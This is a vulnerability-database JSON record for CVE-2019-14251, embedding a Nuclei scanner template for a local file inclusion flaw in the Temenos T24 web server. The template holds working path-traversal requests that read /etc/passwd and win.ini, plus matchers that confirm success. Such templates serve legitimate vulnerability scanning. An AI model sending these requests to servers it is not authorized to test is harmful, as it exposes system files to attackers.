{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2019-14251/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2019-14251/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2019-14251/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2019-14251/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2019-14251/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2019-14251"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2019-14251"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2019/CVE-2019-14251.yaml",
    "nuclei_template_severity": "high",
    "nuclei_template_yaml": "id: CVE-2019-14251\n\ninfo:\n  name: T24 Web Server - Local File Inclusion\n  author: 0x_Akoko\n  severity: high\n  description: T24 web server is vulnerable to unauthenticated local file inclusion that permits an attacker to exfiltrate data directly from server.\n  impact: |\n    Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.\n  remediation: |\n    Apply the latest security patches or updates provided by the vendor to fix the LFI vulnerability in the T24 Web Server.\n  reference:\n    - https://github.com/kmkz/exploit/blob/master/CVE-2019-14251-TEMENOS-T24.txt\n    - https://vuldb.com/?id.146815\n    - https://nvd.nist.gov/vuln/detail/CVE-2019-14251\n    - https://github.com/ARPSyndicate/kenzer-templates\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2019-14251\n    cwe-id: CWE-22\n    epss-score: 0.07849\n    epss-percentile: 0.94427\n    cpe: cpe:2.3:a:temenos:t24:r15.01:*:*:*:*:*:*:*\n  metadata:\n    max-request: 2\n    vendor: temenos\n    product: t24\n  tags: cve,cve2019,temenos,lfi,unauth,vkev,vuln\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/WealthT24/GetImage?docDownloadPath=/etc/passwd\"\n      - \"{{BaseURL}}/WealthT24/GetImage?docDownloadPath=c:/windows/win.ini\"\n\n    matchers-condition: and\n    matchers:\n      - type: regex\n        regex:\n          - \"root:.*:0:0:\"\n          - \"for 16-bit app support\"\n        condition: or\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a00473045022100d8752fc0bdb9f2e642e98e9bc76ae4102d2533de6fee51befacf8b2e5cf1a7a002204c08f6a8a8be10a229cbeefa1240535eec06a65d793ba6a640e17d139155441a:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2019-14251"
}